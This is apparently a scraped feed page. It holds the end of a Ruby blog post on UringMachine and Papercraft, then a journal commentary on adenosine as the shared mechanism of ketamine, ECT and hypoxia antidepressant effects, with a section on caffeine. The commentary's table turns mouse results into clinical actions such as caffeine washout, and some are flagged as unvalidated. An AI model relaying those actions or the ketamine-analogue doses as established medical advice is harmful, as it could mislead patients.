I guess Samuel is really the person to ask this, but personally I would say this is really about experimentation, and seeing how far we can take the idea of a pluggable I/O implementation. Also, the open-ended design of this interface means that we can use a low-level API such as UringMachine to implement it.

What’s Coming Next Week?

Now that the fiber scheduler is feature complete, I’m looking to make it as robust as possible. For this, I intend to add a lot of tests. Right now, the fiber scheduler has 25 tests with 77 assertions, in about 560LOC (the fiber scheduler itself is at around 220LOC). To me this is not enough, so next week I’m going to add tests for the following:

  • IO - tests for all IO instance methods.
  • working with queues: multiple concurrent readers / writers.
  • net/http test: ad-hoc HTTP/1.1 server + Net::HTTP client.
  • sockets: echo server + many clients.

In conjunction with all those tests, I’ll also start working on benchmarks for measuring the performance of the UringMachine low-level API against the UringMachine fiber scheduler and against the “normal” thread-based Ruby APIs.

In addition, I’m working on a pull request for adding an #io_close hook to the fiber scheduler interface in Ruby. Samuel already did some preparation for this, so I hope I can finish this in time for it to be merged in time for the release of Ruby 4.0.

I intend to release UringMachine 1.0 on Christmas, to mark the release of Ruby 4.0.

What About Papercraft?

This week I also managed to take the time to reflect on what I want to do next in Papercraft . I already wrote here about wanting to implement template inlining for Papercraft. I also wanted to rework how the compiled code is generated. I imagined a kind of DSL for code generation, but I didn’t really know what such a DSL would look like.

Then, a few days ago, the idea hit me. I’ve already played with this idea a last year, when I wrote Sirop, a sister gem to Papercraft that does a big part of the work of converting code into AST’s and vice versa. Here’s what I put in the readme:

Future directions: implement a macro expander with support for quote/unquote:

trace_macro = Sirop.macro do |ast| source = Sirop.to_source(ast) quote do result = unquote(ast) puts “The result of #{source} is: #{result}” result end end

def add(x, y) trace(x + y) end

Sirop.expand_macros(method(:add), trace: trace_macro)

The example is trivial and contrived, but I suddenly understand how such an interface could be used to actually generate code in Papercraft. I wrote up an issue for this, and hopefully I’ll have some time to work on this in January.

Adenosine on the common path of rapid antidepressant action: The coffee paradox

Hacker News
genomicpress.kglmeridian.com
2025-12-05 22:10:50
Comments...
Original Article

Introduction

As Claude Bernard understood in laying the foundations of experimental medicine, each scientific generation brings us closer to mechanistic truth, yet complete understanding remains elusive ( 1 ). This has been particularly evident in psychiatric therapeutics, where chance preceded knowledge for a long time. For over twenty years now, we had evidence suggesting that ketamine was a rapid anti-depressant. We knew the electrically charged scalpel of electroconvulsive therapy worked when nothing else did. And we had long suspected that depriving people of sleep benefited them in a transient way. All we were lacking was the mechanistic thread connecting these varied interventions, the common path which might allow for rational, instead of empirical, therapeutic development.

In a study that demonstrates what modern neuroscience can do when technical virtuosity meets conceptual clarity, Yue and colleagues led by Professor Min-Min Luo now provide that thread ( 2 ). Using genetically encoded adenosine sensors, a comprehensive genetic and pharmacological dissection, and immediate therapeutic translation they show that adenosine signalling is the convergent mechanism of rapid-acting antidepressant therapies. It is a new way of thinking about treatment-resistant depression and not just an incremental science.

The technical achievement

The precise timing is what gives the work its compelling quality. The authors applied GRABAdo1.0, a GPCR-based sensor for adenosine, to monitor online adenosine changes in mood-regulating circuits ( 2 ). Injection of ketamine (10 mg/kg) and application of electroconvulsive therapy resulted in a substantial spike in extracellular adenosine in the medial prefrontal cortex and hippocampus with peak amplitudes of ∼15% ΔF/F, which peaked in ∼500 s and lasted about 30 minutes above the baseline (Extended Data Fig. 1d–h in ref. 2 ). The specificity to regions is also telling. Even though adenosine increases occurred in the mPFC and hippocampus, no surge occurred in the nucleus accumbens, suggesting affective circuits, not reward circuits.

Figure 1. Figure 1. Figure 1.

Figure 1. Adenosine Signaling: Convergent Mechanisms for Rapid Antidepressants. Three distinct interventions—ketamine (pharmacological), electroconvulsive therapy/ECT (electrical), and acute intermittent hypoxia/aIH (physiological)—converge on a common mechanism: adenosine surges in the medial prefrontal cortex (mPFC). Ketamine triggers adenosine release through metabolic modulation (decreased ATP/ADP ratio) and ENT1/2-mediated efflux, without causing neuronal hyperactivity. ECT produces adenosine surges via neuronal hyperactivity and rapid metabolic demand. aIH generates adenosine through controlled hypoxia in a non-invasive manner. All three interventions activate A1 and A2A adenosine receptors in the mPFC, detected in real-time using fiber photometry with genetically encoded sensors (GRABAdo1.0). This adenosine signaling triggers downstream synaptic plasticity mechanisms (BDNF upregulation, mTOR activation, neuroplasticity), resulting in rapid antidepressant effects with onset in hours and duration lasting days. Clinical Considerations: The adenosine mechanism raises important questions about caffeine consumption patterns. Tonic signaling (chronic/baseline coffee consumption) appears protective against depression and may help prevent depressive episodes. Phasic signaling (acute pre-treatment coffee) raises mechanistic concerns about potential interference with the adenosine surge during ketamine/ECT administration, though this remains speculative and requires clinical validation. The dual nature of caffeine's effects—protective chronically, potentially interfering acutely—reflects the distinction between tonic baseline adenosine receptor modulation and phasic adenosine surge responses to rapid-acting treatments.

Citation: Brain Medicine 2025; 10.61373/bm025c.0134

The dose-response-use relationships were clear-cut. When the doses of ketamine were 5 mg/kg, modest signals were seen. But then, at 10 and 20 mg/kg there were very clear effects. The higher doses increased the duration of response but had no effect on the peak amplitude. Two-photon imaging showed that the adenosine signal was spatially diffuse. The kinetics was different from that of acute hypoxia which was used by the authors as a positive control. Ketamine at the standard antidepressant dose (10 mg/kg) produced peak amplitudes of approximately 15% ΔF/F, while higher doses (20–50 mg/kg) reached approximately 35% ΔF/F, still substantially lower than the ∼60% ΔF/F observed with acute hypoxia. However, ketamine's decay rate was much slower, taking greater than 500s compared to the hypoxia decay rate of around 50s. The less pronounced peak but prolonged duration suggests that ketamine causes a sustained metabolic modulation rather than acute cellular stress.

This temporal resolution matters. Measuring constant receptor expression or a single-time point tissue sample would have led to missing the adenosine surge that would turn on and off. Only through continuous optics monitoring could it become possible to find a dynamic signal necessary for therapy.

Determining cause and effect in biology

The rigor of the mechanistic proof is exemplary. The importance of the mechanism indicated by the convergence of genetic and pharmacological approaches is shown by studies. Adora1 −/− and Adora2a −/− mice lost all of the antidepressant efficacy of ketamine in two standard tests for depression. The first being the forced swim test which measures behavioral despair and the other the sucrose preference test which measures anhedonia ( 2 ). Results were not paradigm-specific. The necessity also applied in the chronic restraint stress model and the lipopolysaccharide model of inflammatory depression ( 3 , 4 ). Post-hoc acute pharmacological blockade with selective antagonists PSB36 (A1) and ZM241385 (A2A) also completely stripped therapeutic responses to ketamine. This was the case at both 1-hour and 24 hours post-treatment.

The circuit-specificity is equally convincing. Scientists administered AAV-mediated CRISPR-Cas9 to internalize sgRNAs that target Adora1 and Adora2a within the mPFC. The loss of local receptor was sufficient to negate the effect of systemic ketamine ( 2 ). This confirms the mPFC as a key node—consistent with established mood and executive function roles, now established mechanistically.

The sufficiency experiments complete the logical circle. According to research, adenosine may act to prevent or reverse the onset of some diseases. In fact, direct infusion of adenosine into the mPFC produced antidepressant-like effects lasting 24 hours ( 2 ). More elegantly, optogenetic stimulation of astrocytes expressing cOpn5, optogenetic tools that trigger Ca²⁺-dependent ATP release and subsequent CD73-mediated adenosine production, produces therapeutic actions, and this effect was extinguished in Nt5e −/− mice lacking CD73 ( 2 , 5 ). Systemic delivery of selective agonists (CHA for A1, CGS21680 for A2A) produced rapid antidepressant responses, with A1-only action potent enough to sustain effects for 24 hours ( 2 ).

This mechanism was shown with a degree of thoroughness the field demands but rarely achieves.

Mitochondria, not neuronal hyperactivity

The upstream mechanism represents genuinely novel biology. Rather than generating adenosine through extracellular ATP hydrolysis, ketamine directly modulates mitochondrial function to increase intracellular adenosine, which then exits cells via equilibrative nucleoside transporters (ENT1/2). The authors demonstrate this in isolated mPFC mitochondria that are incubated with [ 13 C 3 ]pyruvate. Ketamine (≥2 μM—therapeutically relevant concentrations) ( 6 , 7 ) dose-dependently suppressed 13 C enrichment of TCA cycle intermediates fumarate, malate, and aspartate while causing accumulation of pyruvate ( 2 ).

This metabolic brake cascades into adenosine production. Using PercevalHR sensors to measure intracellular ATP/ADP ratios in vivo, they show that ketamine quickly decreases this ratio in CaMKII⁺ pyramidal neurons (largest effect), GABAergic interneurons (transient reduction with rebound), and astrocytes (sustained decrease) ( 2 ). The timing is telling: the ATP/ADP ratio decrease comes before the extracellular adenosine surge, making metabolic perturbation upstream.

Critically, this occurs without neuronal hyperactivity. By analyzing calcium signaling response in pyramidal and GABAergic neurons to therapeutic doses of ketamine using GCaMP8s, it was found that ketamine at 10 mg/kg did not increase Ca²⁺ signaling in pyramidal neurons and actually decreased activity of GABAergic interneurons ( 2 ). This overturns the assumption that seizure-like neuronal hyperactivity is necessary for rapid antidepressant action. The mechanism is metabolic modulation driving adenosine efflux via equilibrative nucleoside transporters, not excitotoxic processes.

The authors demonstrate that dipyridamole, an ENT1/2 inhibitor, reduces the adenosine signal induced by ketamine, confirming the role of these transporters ( 2 ). In contrast, genetic depletion of CD73 (which hydrolyzes extracellular ATP to adenosine) has no effect on ketamine-induced adenosine surges.¹ The adenosine arises intracellularly and exits through ENT1/2 transporters in response to the concentration gradient produced by metabolic shifts.

From mechanism to molecules

This work goes beyond descriptive neuroscience in its immediate therapeutic translation. Adenosine dynamics appear to act as a functional biomarker in their hands. Based on this observation, the authors synthesized 31 ketamine derivatives by inducing systematic changes in chemical groups affecting their metabolism and receptor binding ( 2 ). Screening identified deschloroketamine (DCK) and deschloro-N-ethyl-ketamine (2C-DCK) as compounds showing 40-80% stronger adenosine signals than ketamine at equivalent doses.

The effects of this drug on behavior were noticed immediately. DCK produced significant antidepressant effects at 2 mg/kg (compared to 10 mg/kg for ketamine) with only a little hyperlocomotion at this dose ( 2 ). This shows a dissociation between therapeutic and psychomimetic effects. In particular, DCK at therapeutic doses showed only a small amount of locomotor activation. On the other hand, ketamine at 10 mg/kg produced significant hyperlocomotion. The enhanced therapeutic index indicates that promoting signaling downstream of adenosine rather than optimizing NMDA receptor nonspecific blockade broadens the safe window.

The authors provide clear evidence for the dissociation between NMDAR antagonism and the release of adenosine. Studies showed that compounds such as 3'-Cl-ketamine blocked NMDARs with high potency (IC₅₀ comparable to ketamine in cortical slice recordings) but did not induce adenosine surges and are ineffective as an antidepressant ( 2 ). The correlation between the estimated in vivo NMDAR inhibitions (derived from the ex vivo IC 50 values and brain tissue concentrations) and adenosine modulation was non-significant (Pearson r, P = 0.097).¹ Therefore, NMDAR antagonism is neither necessary nor sufficient; the therapeutic action operates via ketamine's direct mitochondrial actions.

This metabolic evidence is consistent with the parent compound driving adenosine release. In contrast, ketamine's primary metabolites—norketamine and (2R,6R)-hydroxynorketamine—do not produce adenosine responses at equivalent doses ( 2 ). Notably, hydroxynorketamine does have antidepressant properties in some studies ( 8 ). Inhibition of metabolism is important: CYP3A4 inhibitors (ketoconazole, ritonavir) potentiated the adenosine signal, whilst CYP2B6 inhibition (ticlopidine) did not ( 2 ).

Electroconvulsive therapy and beyond

The adenosine framework extends beyond ketamine. Seizures induced by electroconvulsive therapy (ECT) in anesthetized mice (40 mA, 100 Hz, 10s) mediated an adenosine surge in medial prefrontal cortex (mPFC) comparable in magnitude to that of ketamine but with faster kinetics ( 2 ). That is, the onset and decay of adenosine signaling are faster, consistent with the idea that ECT produces intense but brief neuronal firing. According to the authors, the requirement for adenosine to mediate these antidepressant effects is also the same. Adora1 −/− mice (lacking the adenosine receptor A1) and Adora2a −/− mice (lacking the adenosine receptor A2A) did not respond to ECT with reductions in immobility in forced swim test or restored preference for sucrose in sucrose preference test ( 2 ).

The researchers found that acute intermittent hypoxia (aIH), which is a controlled reduction in oxygen that consists of 5 cycles of 9% O₂ for a duration of 5 min, interspersed with 21% O₂, when done daily for 3 days produces antidepressant effects that were entirely reliant on adenosine signaling.¹ Most importantly, from a clinical perspective, aIH is non-invasive, has been shown to be safe in other clinical contexts ( 9 ), does not require any complex machinery as long as oxygen can be controlled, and could be rolled out in low-resourced settings. Adenosine receptor knockout mice had no antidepressant effects from aIH, which indicates that aIH, ketamine, and ECT share identical mechanistic dependence on adenosine signaling ( Figure 1 ) ( 2 ).

The coffee question: Clinical and mechanistic insights

It is certainly a paradoxical sort of story worth noticing. The most commonly consumed psychoactive drug in the world is caffeine, which functions as an adenosine receptor antagonist ( Figure 2 ). The study makes it clear that “the possibility of dietary caffeine interfering with these treatments ( 2 , 10 , 11 ).” The warning has mechanistic grounding: if activation of adenosine receptors is necessary for therapeutic effectiveness, and caffeine is an adenosine receptor antagonist, then coffee drinking can be expected to blunt treatment response.

Figure 2. Figure 2. Figure 2.

Figure 2. The coffee paradox in adenosine-mediated antidepressant action. Depression (left) and coffee consumption (right) are both linked through adenosine signaling (center), creating a pharmacological paradox: chronic coffee drinking appears protective against depression through tonic adenosine receptor modulation, while acute pre-treatment caffeine may attenuate the phasic adenosine surge required for rapid antidepressant responses to ketamine and electroconvulsive therapy.

Citation: Brain Medicine 2025; 10.61373/bm025c.0134

The epidemiological literature paints a different picture. The findings of a number of meta-analyses indicate that chronic coffee consumption protects against depression. One meta-analysis found that RR coffee 0.757, RR caffeine 0.721 ( 12 ). Another one found RR 0.76, with an optimal protective effect at ∼400 mL/day ( 13 ). In comparison to many drug treatments that have an effect size in this range, this is not a small effect size. A risk reduction of 20 to 25% is quite impressive.

Ideas based on known pharmacology, but not yet directly

One might find answers in the tonic and phasic adenosine signaling and if there is any receptor reserve. Ongoing caffeine use will cause a modest (∼20%) upregulation of A1 receptors, but crucially, this upregulation does not interfere with any functional signaling capacity of the receptor upon binding of adenosine ( 14 ). The receptors are still functional; there are just more of them.

Furthermore, adenosine receptors show a significant “spare receptor” reserve, with A2A receptor reserve estimated to be 70–90% and 10–64% for A1 receptors. It means a 5–10% occupancy of the receptor can give rise to approximately a 50% maximal effect ( 15 , 16 ). An antagonist must occupy more than 95% of the receptors to block any effect when spare receptors are present ( 15 ).

The pharmacokinetics of caffeine is relevant here. Caffeine has a half-life of 3–7 hours and a peak concentration 45–60 minutes after ingestion, with a receptor occupancy of ∼50%–65% between doses in regular consumers ( 11 , 17 ).

When there is chronic consumption, there is usually a tonic effect which results in more receptors being upregulated in addition to a maintained spare receptor reserve. While there is partial occupancy on the receptors, there is no complete occupancy. The fundamental adenosinergic tone might be augmented in the presence of the antagonist consistent with epidemiological protection from depression.

Prior consumption of caffeine (phasic blockade) must be overcome by the adenosine surge following ketamine or ECT application. When caffeine occupies 50–65% of receptors, there's still considerable receptor reserve available. This means the adenosine surge has to work harder to overcome the blockade, weakening the signal without wiping it out completely. With considerable but not infinite receptor reserve, adenosine signal decreases but does not get obliterated.

More tailored approaches instead of outright bans are suggested by this pharmacologcial analysis.

  • Regular caffeine/coffee use pre-ketamine is probably not contraindicated. Epidemiological data suggest a possible benefit of that use.

  • Having coffee just before the treatment is more concerning. Patients may be recommended caffeine washout to achieve optimal adenosine receptor availability during the critical adenosine spike.

  • Drinking coffee after treatment is probably safe once the first plasticity mechanisms are already established.

Can we test whether regular coffee drinkers show blunted ketamine responses? Does controlled caffeine washout enhance outcomes? Is there a link between caffeine use and the response? The current paper offers the mechanistic foundation to pose such questions rigorously.

But these things are still open empirical questions, sadly. This system has not yet undergone quantitative pharmacology that links chronic receptor modulation with acute receptor reserve and surge amplitudes large enough to overcome partial blockade. Yue et al. clarify mechanisms to ensure that scientists pose the right questions.

What remains unknown

What makes this piece valuable is its honesty about the boundaries of its work. Several questions merit attention.

The mechanisms linking acute adenosine surges to sustained plasticity are not well defined. The authors demonstrate that the upregulation of BDNF [a key transducer of antidepressant effects ( 18 )] produced by ketamine requires the A1 and A2A receptors ( 2 ), linking adenosine to established pathways of neuroplasticity. Still, more elaboration is needed on how a surge of adenosine for ∼30 minutes produces antidepressant effects extending over days-to-weeks. HOMER1A activation and stimulation of the mTOR pathway are cited in the paper as likely downstream effectors ( 2 , 19 , 20 ) but the full signalling pathway has yet to be defined.

Second, the hippocampal story is incomplete. After ketamine, adenosine levels soared in the hippocampus in a manner comparable to that in the mPFC ( 2 ). It should be noted that optogenetic initiation of adenosine and the direct infusion of adenosine into the dorsal hippocampus did not produce an antidepressant effect ( 2 ). This suggests functional heterogeneity, possibly along the dorsal–ventral axis. With the ventral hippocampus having greater associations with mood circuits and the dorsal hippocampus serving cognitive and spatial functions. The authors rightly highlight the need for an investigation of this complex matter.

We will need to incorporate these into our understanding of the relationship between adenosine and the other proposed ketamine mechanisms. In this area, there has been interest in NMDAR antagonism ( 21 ), AMPA receptor potentiation ( 22 ), mTOR activation ( 23 ) and various metabolite effects ( 8 ). The current work shows that adenosine is necessary and sufficient and that the NMDAR block dissociates from therapeutic action across derivatives. lthough the position of adenosine in the signaling cascade remains unclear, whether it operates in parallel with, upstream of, or downstream from other mechanisms, the authors' data suggest that adenosine may be the primary initiating signal and that other mechanisms are downstream consequences but this is yet to be validated.

To apply this finding to treatment resistant depression in humans, we have to keep in mind the heterogeneity that clinical psychiatry so well knows. Some patients do not respond to ketamine and not all respond to ECT. Do nonresponders have defects in how they produce adenosine, express receptors, or couple receptor signaling? Can adenosine dynamics—appraised with PET tracers for A1 and A2A receptors and, if predictive, using peripheral biomarkers—sample patients likely to respond? These questions ultimately determine clinical utility.

A framework for rational development

Unfortunately, psychiatry has depended much more on serendipity than mechanism for a long time. The monoamine hypothesis was discovered accidentally (as with iproniazid and imipramine). The atypical antipsychotics resulted from chemical modifications aimed at fewer side effects. Finally, the discovery of ketamine's antidepressant properties occurred by accident during studies of its properties. We have been, in Baudrillard's concept, cartographers mapping territories we have not yet crossed: “The territory no longer precedes the map, nor survives it. Henceforth, it is the map that precedes the territory ( 24 ).” We say we know what works without knowing why.

In contrast, Yue et al. provide an extraodinary map after exquisitely researching the territory. With adenosine as the mechanistic target, the authors have already demonstrated proof-of-principle: derivatives with enhanced adenosine signaling show improved therapeutic indices.¹ The path forward involves:

  • Medicinal chemistry optimization of adenosine-enhancing compounds, prioritizing metabolic mitochondrial modulators over NMDAR antagonists.

  • Allosteric modulation of A1 and A2A receptors to enhance endogenous signaling without tonic activation.

  • Non-pharmacological interventions (aIH, potentially others) that leverage adenosine biology.

  • Biomarker development for patient stratification and response prediction.

  • Combination strategies targeting complementary nodes in the adenosine-plasticity cascade.

The technical platform is robust: genetically encoded sensors provide real-time functional readouts for compound screening; the behavioral assays are well-validated; the genetic models allow mechanistic dissection; the therapeutic endpoints (onset, duration, side effects) are clinically meaningful.

Most critical is that the work establishes that rapid antidepressant action is not a pharmacological curiosity of a dissociative anesthetic. A reproducible neurobiological phenomenon, adenosine-driven plasticity in mood-regulatory circuits, can be triggered by multiple routes. This converts an empirical observation (ketamine works fast) into a biological principle (adenosine surges trigger antidepressant plasticity) that guides rational therapeutic development ( Table 1 ).

Table 1. Clinical Implications of Adenosine-Based Antidepressant Mechanisms

Clinical Domain Key Finding Clinical Action
Caffeine & Treatment Timing
Chronic consumption Protective: 20–25% risk reduction ( 12 , 13 ) Continue usual intake; may prevent depression
Acute pre-treatment Occupies 50–65% receptors for 3–7 h ( 15 , 16 ) Consider 12–24 h washout before ketamine/ECT *
Mechanistic basis Tonic signaling (baseline) vs. phasic signaling (treatment surge) Distinguish chronic protective effects from acute interference potential *
Novel Therapeutics
Improved derivatives DCK: 5 × lower dose, reduced side effects ( 2 ) Monitor clinical trials of optimized compounds
Non-pharmacological aIH produces adenosine-dependent effects ( 2 ) Consider for drug-intolerant patients; scalable alternative to ECT
A1 receptor agonists Sufficient for 24 h antidepressant action ( 2 ) Potential monotherapy or adjunct strategy
A2A receptor role Contributes to acute effects; less sustained than A1 ( 2 ) May complement A1 activation in combination approaches
Mechanistic Insights
Mitochondrial targeting Ketamine modulates metabolism directly, not primarily via NMDAR ( 2 ) Focus drug development on metabolic modulators over NMDAR antagonists
ENT1/2 transporters Mediate adenosine efflux from intracellular compartment ( 2 ) Consider ENT modulation as therapeutic strategy
Metabolic brake Decreased ATP/ADP ratio precedes adenosine surge ( 2 ) Target upstream metabolic pathways for novel interventions
Patient Stratification
Genetic predictors A1/A2A polymorphisms may predict response Consider genotyping in treatment-resistant cases *
Biomarker development Real-time adenosine monitoring validated; peripheral markers possible ( 2 ) Research protocols for response prediction; drug screening platform
Treatment history Chronic caffeine users may have upregulated receptors with preserved reserve ( 14 16 ) Caffeine history as potential predictor (requires validation) *
Treatment Optimization
Mechanism separation Antidepressant ≠ psychomimetic effects ( 2 ) Lower doses reduce dissociation/abuse risk
Circuit specificity mPFC adenosine necessary & sufficient ( 2 ) Future: regional targeting strategies; hippocampal effects require further study
Temporal dynamics ∼30 min adenosine surge → days of benefit ( 2 ) Optimize inter-treatment intervals; single surge sufficient for sustained effects
Dose-response Higher doses prolong duration without increasing peak ( 2 ) Titrate for optimal balance of efficacy and side effects
Safety & Side Effects
Therapeutic window DCK effective at 2 mg·kg⁻¹ with minimal hyperlocomotion vs. ketamine 10 mg·kg⁻¹ ( 2 ) Enhanced safety profile possible with adenosine-optimized compounds
Dissociation avoidance Adenosine mechanism separable from NMDAR psychotomimetic effects ( 2 ) Target adenosine pathway to minimize dissociative experiences
Non-Pharmacological Interventions
aIH advantages Non-invasive, safe profile in humans, no complex equipment required ( 9 , 2 ) Implement in low-resource settings; option for treatment-resistant patients
ECT mechanistic insight Adenosine mediates ECT effects; A1/A2A receptors required ( 2 ) Optimize ECT protocols based on adenosine dynamics; predict responders *
Sleep deprivation Known to increase adenosine ( 20 ) Investigate adenosine monitoring during sleep deprivation therapy *
Biomarker Applications
Drug development Adenosine dynamics as functional readout for compound screening ( 2 ) Use GRABAdo sensors for phenotypic drug discovery
Response prediction PET tracers for A1/A2A available; peripheral markers under investigation Develop clinical-grade adenosine monitoring protocols *
Treatment monitoring Real-time adenosine measurement feasible ( 2 ) Potential for dose optimization during treatment *
Combination Strategies
With existing SSRIs Adenosine pathway may complement monoaminergic effects Investigate sequential or concurrent administration *
With psychotherapy Rapid symptom relief may enhance therapy engagement Time psychotherapy sessions to peak neuroplasticity window *
Multi-modal approaches Combine pharmacological + aIH for additive effects Pilot studies of combination protocols *

Conclusions

As we have previously written about the psychotherapeutics, it is only time that will tell how far our conceptions of causation are from physical reality. Yue et al. have greatly shortened that distance. The overarching mechanism or platform refers to elements including genetically encoded sensors, validated targets, proof-of-principle molecules, non-drug alternatives and the general model explaining disparate interventions.

The adenosine hypothesis can be tested with readily available tools and immediate therapeutic implications. Yue et al. have given the field the aerial view after decades wandering through the forest of empirical psychopharmacology and not looking beyond the next tree.

Perhaps the most intriguing implication of this work lies in an unexpected connection: the most rigorous mechanistic dissection of rapid antidepressant action identifies adenosine as the critical mediator, yet adenosine receptors are the primary target of caffeine, the world's most widely consumed psychoactive substance. Is this merely coincidence, or does it reveal something fundamental about why humans have gravitated toward caffeine consumption across cultures and millennia? The epidemiological protection that chronic coffee drinking confers against depression may represent an inadvertent form of adenosinergic modulation operating at population scale. Yet the same mechanism that provides tonic benefit might interfere with phasic therapeutic surges during acute treatment.

The coffee paradox demands resolution through carefully designed clinical studies. Do regular coffee drinkers show altered responses to ketamine or electroconvulsive therapy? Does pre-treatment caffeine washout enhance therapeutic outcomes? Can we develop dosing strategies that preserve the protective effects of chronic consumption while optimizing acute treatment responses? The convergence of the world's most prevalent psychoactive drug with the mechanistic lynchpin of our most effective rapid antidepressants is unlikely to be accidental. Understanding this intersection may illuminate both the widespread appeal of caffeine and the optimization of adenosine-targeted therapeutics. The next generation of clinical trials should systematically examine caffeine consumption patterns as a critical variable in treatment response, transforming an apparent pharmacological complication into a therapeutic opportunity.

Author contributions

Both authors contributed equally and fully to this article.

Funding sources

The authors are supported by funding from the NIH/National Institute of Mental Health (R0MH127423).

Author disclosures

The authors declare no conflict of interests.

References

  • 1.

    Bernard C

    . An introduction to the study of experimental medicine .

    New York

    :

    Dover Publications

    ; 1957 . 226 p.

  • 2.

    Yue C

    ,

    Wang N

    ,

    Zhai H

    ,

    Yuan Z

    ,

    Cui Y

    ,

    Quan J

    , et al. Adenosine signalling drives antidepressant actions of ketamine and ECT . Nature . 2025 . DOI: 10.1038/s41586-025-09755-9 . PMID: 41193806

  • 3.

    Walker AK

    ,

    Budac DP

    ,

    Bisulco S

    ,

    Lee AW

    ,

    Smith RA

    ,

    Beenders B

    , et al. NMDA receptor blockade by ketamine abrogates lipopolysaccharide-induced depressive-like behavior in C57BL/6J mice . Neuropsychopharmacology . 2013 ; 38 (

    9

    ): 1609 16 . DOI: 10.1038/npp.2013.71 . PMID: 23511700 ; PMCID: PMC3717543

  • 4.

    Sternberg EM

    ,

    Licinio J

    . Overview of neuroimmune stress interactions. Implications for susceptibility to inflammatory disease . Ann NY Acad Sci . 1995 ; 771 : 364 71 . DOI: 10.1111/j.1749-6632.1995.tb44695.x . PMID: 8597414

  • 5.

    Li H

    ,

    Zhao Y

    ,

    Dai R

    ,

    Geng P

    ,

    Weng D

    ,

    Wu W

    , et al. Astrocytes release ATP/ADP and glutamate in flashes via vesicular exocytosis . Mol Psychiatry . 2025 ; 30 (

    6

    ): 2475 89 . DOI: 10.1038/s41380-024-02851-8 . PMID: 39578520

  • 6.

    Fond G

    ,

    Loundou A

    ,

    Rabu C

    ,

    Macgregor A

    ,

    Lancon C

    ,

    Brittner M

    , et al. Ketamine administration in depressive disorders: a systematic review and meta-analysis . Psychopharmacology (Berl) . 2014 ; 231 (

    18

    ): 3663 76 . DOI: 10.1007/s00213-014-3664-5 . PMID: 25038867

  • 7.

    Zanos P

    ,

    Moaddel R

    ,

    Morris PJ

    ,

    Riggs LM

    ,

    Highland JN

    ,

    Georgiou P

    , et al. Ketamine and Ketamine metabolite pharmacology: insights into therapeutic mechanisms . Pharmacol Rev . 2018 ; 70 (

    3

    ): 621 60 . DOI: 10.1124/pr.117.015198 . PMID: 29945898 ; PMCID: PMC6020109

  • 8.

    Zanos P

    ,

    Moaddel R

    ,

    Morris PJ

    ,

    Georgiou P

    ,

    Fischell J

    ,

    Elmer GI

    , et al. NMDAR inhibition-independent antidepressant actions of ketamine metabolites . Nature . 2016 ; 533 (

    7604

    ): 481 6 . DOI: 10.1038/nature17998 . PMID: 27144355 ; PMCID: PMC4922311

  • 9.

    Navarrete-Opazo A

    ,

    Mitchell GS

    . Therapeutic potential of intermittent hypoxia: a matter of dose . Am J Physiol Regul Integr Comp Physiol . 2014 ; 307 (

    10

    ): R1181 97 . DOI: 10.1152/ajpregu.00208.2014 . PMID: 25231353 ; PMCID: PMC4315448

  • 10.

    Lopes JP

    ,

    Pliássova A

    ,

    Cunha RA

    . The physiological effects of caffeine on synaptic transmission and plasticity in the mouse hippocampus selectively depend on adenosine A 1 and A 2A receptors . Biochem Pharmacol . 2019 ; 166 : 313 21 . DOI: 10.1016/j.bcp.2019.06.008 . PMID: 31199895

  • 11.

    Fredholm BB

    ,

    Bättig K

    ,

    Holmén J

    ,

    Nehlig A

    ,

    Zvartau EE

    . Actions of caffeine in the brain with special reference to factors that contribute to its widespread use . Pharmacol Rev . 1999 ; 51 (

    1

    ): 83 133 . PMID: 10049999

  • 12.

    Wang L

    ,

    Shen X

    ,

    Wu Y

    ,

    Zhang D

    . Coffee and caffeine consumption and depression: A meta-analysis of observational studies . Aust N Z J Psychiatry . 2016 ; 50 (

    3

    ): 228 42 . DOI: 10.1177/0004867415603131 . PMID: 26339067

  • 13.

    Grosso G

    ,

    Micek A

    ,

    Castellano S

    ,

    Pajak A

    ,

    Galvano F

    . Coffee, tea, caffeine and risk of depression: A systematic review and dose-response meta-analysis of observational studies . Mol Nutr Food Res . 2016 ; 60 (

    1

    ): 223 34 . DOI: 10.1002/mnfr.201500620 . PMID: 26518745

  • 14.

    Holtzman SG

    ,

    Mante S

    ,

    Minneman KP

    . Role of adenosine receptors in caffeine tolerance . J Pharmacol Exp Ther . 1991 ; 256 (

    1

    ): 62 8 . PMID: 1846425

  • 15.

    Shryock JC

    ,

    Ozeck MJ

    ,

    Belardinelli L

    . Inverse agonists and neutral antagonists of recombinant human A1 adenosine receptors stably expressed in Chinese hamster ovary cells . Mol Pharmacol . 1998 ; 53 (

    5

    ): 886 93 . PMID: 9584215

  • 16.

    Shryock JC

    ,

    Snowdy S

    ,

    Baraldi PG

    ,

    Cacciari B

    ,

    Spalluto G

    ,

    Monopoli A

    , et al. A2A-adenosine receptor reserve for coronary vasodilation . Circulation . 1998 ; 98 (

    7

    ): 711 8 . DOI: 10.1161/01.cir.98.7.711 . PMID: 9715864

  • 17.

    Ishibashi K

    ,

    Miura Y

    ,

    Wagatsuma K

    ,

    Toyohara J

    ,

    Ishiwata K

    ,

    Ishii K

    . Adenosine A 2A receptor occupancy by caffeine after coffee intake in Parkinson's disease . Mov Disord . 2022 ; 37 (

    4

    ): 853 7 . DOI: 10.1002/mds.28897 . PMID: 35001424 ; PMCID: PMC9306703

  • 18.

    Björkholm C

    ,

    Monteggia LM

    . BDNF – a key transducer of antidepressant effects . Neuropharmacology . 2016 ; 102 : 72 9 . DOI: 10.1016/j.neuropharm.2015.10.034 . PMID: 26519901 ; PMCID: PMC4763983

  • 19.

    Serchov T

    ,

    Clement HW

    ,

    Schwarz MK

    ,

    Iasevoli F

    ,

    Tosh DK

    ,

    Idzko M

    , et al. Increased signaling via adenosine A1 receptors, sleep deprivation, imipramine, and ketamine inhibit depressive-like behavior via induction of Homer1a . Neuron . 2015 ; 87 (

    3

    ): 549 62 . DOI: 10.1016/j.neuron.2015.07.010 . PMID: 26247862 ; PMCID: PMC4803038

  • 20.

    Li N

    ,

    Lee B

    ,

    Liu RJ

    ,

    Banasr M

    ,

    Dwyer JM

    ,

    Iwata M

    , et al. mTOR-dependent synapse formation underlies the rapid antidepressant effects of NMDA antagonists . Science . 2010 ; 329 (

    5994

    ): 959 64 . DOI: 10.1126/science.1190287 . PMID: 20724638 ; PMCID: PMC3116441

  • 21.

    Berman RM

    ,

    Cappiello A

    ,

    Anand A

    ,

    Oren DA

    ,

    Heninger GR

    ,

    Charney DS

    , et al. Antidepressant effects of ketamine in depressed patients . Biol Psychiatry . 2000 ; 47 (

    4

    ): 351 4 . DOI: 10.1016/s0006-3223(99)00230-9 . PMID: 10686270

